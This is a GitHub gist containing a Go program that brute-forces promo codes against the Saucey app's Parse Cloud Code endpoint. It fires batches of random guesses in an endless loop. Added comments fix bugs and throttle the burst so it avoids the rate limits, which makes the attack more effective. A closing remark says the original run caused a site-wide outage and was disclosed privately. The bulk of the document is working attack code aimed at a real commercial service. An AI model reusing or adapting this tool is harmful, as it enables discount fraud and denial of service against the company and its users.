

@dancompton
Created October 10, 2015 23:15
Bruteforce saucey promocodes
package main
import (
	"bytes"
	"encoding/json"
	"io/ioutil"
	"math/rand"
	"net/http"
	"sync"
	"time"

	log "github.com/Sirupsen/logrus"
)
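// applyCodeURL is the Parse Cloud Code function each promo-code guess is posted to.
const applyCodeURL = "https://api.parse.com/1/functions/applyCode"

// codeAlphabet is the character set a promo code is drawn from (36 symbols, so a
// 6-character code has 36^6 ≈ 2.2e9 possibilities; at ~1000 guesses/minute that
// keyspace is not realistically exhaustible by this tool).
const codeAlphabet = "abcdefghijklmnopqrstuvwxyz1234567890"

// codeLength is the number of characters in a guessed promo code.
const codeLength = 6

// httpClient is shared by every attempt so that connections are reused, and it
// carries a timeout. The original built a fresh *http.Client with no timeout per
// request, so a stalled server could pin a goroutine (and its batch) forever.
var httpClient = &http.Client{Timeout: 15 * time.Second}

// applyCodePayload is the body the Parse JavaScript SDK sends for a Cloud Code
// call (the "_ClientVersion":"js1.3.4" value suggests SDK 1.3.4). The credential
// fields are blank in the published gist — presumably redacted; a request the
// server accepts would need the app's ApplicationId and JavaScriptKey.
type applyCodePayload struct {
	PromoCode      string `json:"promoCode"`
	ApplicationID  string `json:"_ApplicationId"`
	JavaScriptKey  string `json:"_JavaScriptKey"`
	ClientVersion  string `json:"_ClientVersion"`
	InstallationID string `json:"_InstallationId"`
	SessionToken   string `json:"_SessionToken"`
}

// randomCode returns one candidate promo code of codeLength characters drawn
// uniformly from codeAlphabet via the global math/rand source (safe for
// concurrent use). Before Go 1.20 that source defaults to seed 1 unless
// rand.Seed is called, in which case every run retries the same code sequence.
func randomCode() string {
	buf := make([]byte, codeLength)
	for i := range buf {
		buf[i] = codeAlphabet[rand.Intn(len(codeAlphabet))]
	}
	return string(buf)
}

// req submits one randomly generated promo code to the applyCode Cloud Code
// function and logs the guessed code, the HTTP status and the response body.
// Errors are logged and the attempt abandoned; nothing is returned.
//
// Fixes over the original: the http.NewRequest error was discarded; the
// client.Do error was logged but execution fell through to resp.Body.Close()
// on a nil response (a nil-pointer panic on any network failure); the body is
// now json.Marshal'd instead of string-built; the ioutil.ReadAll error is
// checked; and the log line now includes the code and status, without which a
// successful guess could not be matched to the code that produced it, and a
// 429/5xx — the rate-limit symptom the gist's author describes — was invisible.
func req() {
	code := randomCode()
	payload, err := json.Marshal(applyCodePayload{
		PromoCode:     code,
		ClientVersion: "js1.3.4",
	})
	if err != nil {
		log.Error("encoding applyCode payload: ", err)
		return
	}

	httpReq, err := http.NewRequest("POST", applyCodeURL, bytes.NewReader(payload))
	if err != nil {
		log.Error("building applyCode request: ", err)
		return
	}
	httpReq.Header.Set("Content-Type", "application/json")

	resp, err := httpClient.Do(httpReq)
	if err != nil {
		// resp is nil whenever err != nil; return before touching it.
		log.Error("applyCode request for ", code, ": ", err)
		return
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Error("reading applyCode response for ", code, ": ", err)
		return
	}
	log.Info(code, " ", resp.Status, " ", string(body))
}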
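// attemptsPerBatch is how many codes are tried per batch. The original loop ran
// i = 1..999, i.e. 999 attempts; the count is kept, only named.
const attemptsPerBatch = 999

// maxInFlight bounds how many attempts run concurrently within a batch. The
// original started all 999 goroutines at once; the gist's author reports that
// the resulting burst tripped Parse's global rate limiting and took the whole
// app down for every user, so the burst is now smoothed through a semaphore.
// Lower this (and/or raise batchInterval) when the target's limits are unknown.
const maxInFlight = 20

// batchInterval is the pause between batches.
const batchInterval = 60 * time.Second

// main loops forever: each iteration fires attemptsPerBatch calls to req (at
// most maxInFlight at a time), waits for all of them, then sleeps for
// batchInterval. There is no stop condition; interrupt the process to end it.
//
// Fixes over the original: wg.Add(1) was called inside each goroutine, after
// `go`, so wg.Wait() could observe a zero counter and return before the
// goroutines had registered themselves — the batch was not reliably waited
// for. Add is now called by the spawning loop before the goroutine starts.
// math/rand is also seeded here: before Go 1.20 the global source defaults to
// seed 1, so every run of the original guessed the same sequence of codes.
// (rand.Seed is a no-op on Go 1.20+, where the source is auto-seeded.)
func main() {
	rand.Seed(time.Now().UnixNano())

	for {
		var wg sync.WaitGroup
		sem := make(chan struct{}, maxInFlight)
		for i := 0; i < attemptsPerBatch; i++ {
			wg.Add(1)
			sem <- struct{}{} // blocks while maxInFlight attempts are running
			go func() {
				defer wg.Done()
				defer func() { <-sem }()
				req()
			}()
		}
		wg.Wait()
		time.Sleep(batchInterval)
	}
}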
@dancompton

Brute-forcing Saucey app promo codes caused a site-wide DoS because the API rate limiting was global rather than per-endpoint: the flood of promo-code guesses exhausted the app's limit and throttled every other client as well. This issue was reported privately and was fixed a while back.
